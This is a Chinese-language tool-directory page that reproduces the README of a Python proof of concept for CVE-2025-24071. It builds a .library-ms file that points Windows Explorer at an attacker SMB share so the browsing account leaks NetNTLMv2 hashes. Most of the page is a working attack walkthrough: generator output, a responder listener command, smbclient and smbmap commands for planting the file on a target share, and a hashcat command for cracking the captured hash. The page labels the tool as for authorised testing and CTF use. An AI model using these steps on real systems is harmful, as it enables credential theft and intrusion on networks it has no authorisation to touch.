Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/daemon-404/poc-cve-2025-24071
密码攻击漏洞分析漏洞利用网络安全CTF渗透测试红队实验室与实践
GitHubdaemon-404/poc-cve-2025-24071

PoC-CVE-2025-24071

用于CVE-2025-24071的Python PoC,通过构造一个.library-ms文件,诱使Windows资源管理器通过SMB泄露NetNTLMv2哈希,以便进行捕获和破解。

查看仓库
13小时56分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

❀ coerce-library

CVE-2025-24071 — .library-ms NTLM 强制认证(SMB / TAR 方法)

主题: Rosé Pine Python: 3.9+ CVE: 2025-24071

协议: SMB 捕获: NetNTLMv2 用途: 实验室 / CTF


❀ 功能说明

程序会询问你的攻击 IP和文件名,生成一个指向 \\<IP>\share 的 .library-ms 文件,并将其打包进 exploit.tar。当资源管理器浏览 散放的 .library-ms 文件所在的文件夹时,它会自动解析该 UNC 路径,并将该账户的 NTLMv2 哈希泄露到你的监听器——无需任何点击。

⚠️ 触发的是散放的 .library-ms 文件——而不是 .tar。 放在共享上的 .tar 文件是惰性的;资源管理器不会解析 tar 包。你必须将 .library-ms 本身作为散放文件 放到共享上。具体如何操作取决于所使用的工具(见下文)。


❀ 运行

root@kitploit:~
uv run coerce_library.py      # or: python3 coerce_library.py
root@kitploit:~
Attack IP [10.10.14.197]:
File name [documents]:
[+] documents.library-ms  ->  \\10.10.14.197\share
[+] packed into exploit.tar

❀ 后续步骤

1) 监听

root@kitploit:~
sudo responder -I tun0

2) 将 .library-ms 放到可写共享上

smbclient — 上传 .tar,然后在服务端用 tar x 解压(会在旁边释放出散放的 .library-ms):

root@kitploit:~
smbclient //<TARGET>/<SHARE> -U '<DOMAIN>/<USER>%<PASS>' -c 'put exploit.tar; tar x exploit.tar'

smbmap — 没有解压步骤,因此直接上传散放的 .library-ms (在此上传 .tar 没有任何作用——它无法解包):

root@kitploit:~
smbmap -H <TARGET> -d <DOMAIN> -u <USER> -p <PASS> --upload exploit.library-ms 'IT/exploit.library-ms'

确认它已作为散放文件落在共享上:

root@kitploit:~
smbclient //<TARGET>/<SHARE> -U '<DOMAIN>/<USER>%<PASS>' -c 'ls' | grep library

3) 破解捕获的 NTLMv2

root@kitploit:~
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

☧ 仅限授权渗透测试 / CTF / 实验室使用 ☧

下载工具